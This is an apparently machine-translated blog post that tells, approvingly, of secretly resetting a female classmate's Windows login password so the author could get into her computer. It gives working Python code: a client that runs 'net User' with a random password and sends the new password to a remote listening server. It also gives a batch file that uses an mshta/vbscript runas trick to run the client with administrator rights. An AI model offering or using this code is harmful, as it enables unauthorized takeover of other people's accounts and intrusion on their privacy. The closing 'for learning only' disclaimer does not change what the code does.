I modified ban Hua's boot password in Python and found her secret after logging in again!

modified ban hua boot password


Ban Hua and I said her phone was broken. Let me see , It must be my duty !【 Excited for half an hour 】 Nothing else, I just want to show my technology ! I fixed it in five minutes , After the computer restarts, it displays enter password , At that time, I didn't think much about it and went straight away . After going back, can I use technology to remotely analyze this boot password , Do as you say .

Tool preparation

development environment :win10、python3.7
development tool :pycharm

Analysis of project ideas

At the thought of remote , Just think of creating a connection , At the thought of creating links , Think of socket Socket ( At the thought of socket , Just think I don't have a girlfriend )
The project code is 3 Share ( Remember that you take the server code , Customer service code and go.cmd It's for someone else )

First, create a service on the server side in the normal process
Server process :

  • Create socket
    - binding ip And port
    - Set listening
    - Waiting for link
    - Accept data print data
    - Close links
import socket # Import socket
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # establish socket
server.bind(('', 44444)) # binding IP/ port
server.listen(5) # monitor
print('*********** Waiting for the connection *********')
conn, addr = server.accept() # Connect
print(' Address of the client :', addr)
client_msg = conn.recv(1024)
print(' The password modified by the client is : %s' % client_msg)

windows The command to change the computer password :net User user name Changed password ( You can try it yourself )
Client process :

  • Create socket
    - Connect to the server IP And port
    - Get the current computer account name
    - Generate random computer passwords
    - Perform the modification at the terminal Windows Password instructions
    - Send the modified password
    - Close socket
import socket # Import the modules used
import getpass
import subprocess
import random
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # establish socket example
client.connect((ip, port )) # Connect server End IP Address / Port according to your actual situation
user = getpass.getuser() # Get the computer user name
psd = ''
for j in range(1, 9): # Generate 1-9 The random number
m = str(random.randrange(0, 10))
psd = psd + m
subprocess.Popen(['net', 'User', user, psd]) # Execute locally ( Be similar to cmd command )
client.send(psd.encode('utf-8')) # Send password to server End
back_msg = client.recv(1024)
client.close() # close socket

At this point, you can basically try it yourself , But be careful , The current code can only be modified. The permission is admin The account of .
    Still turning !!!!!!!!
    Here's how to modify non admin The content of ??????

Not admin Users need to improve their execution permissions
Execute directly with super administrator privileges cmd file

@echo off
%1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0 ::","","runas",1)(window.close)&&exit
cd /d "%~dp0"
start python client.py


Finally, I changed my password and successfully logged in , I found her password !

This iron is simple C I don't know how to clean up when the disk is full , At first glance, I just don't know much about computers ! Ban Hua is so beautiful that she doesn't know much about computers , What an amazing discovery !

PS: Finally, I didn't move anything and changed back ! Only for learning and technical exchange ! Don't break the law and discipline ! I will not bear all the consequences !

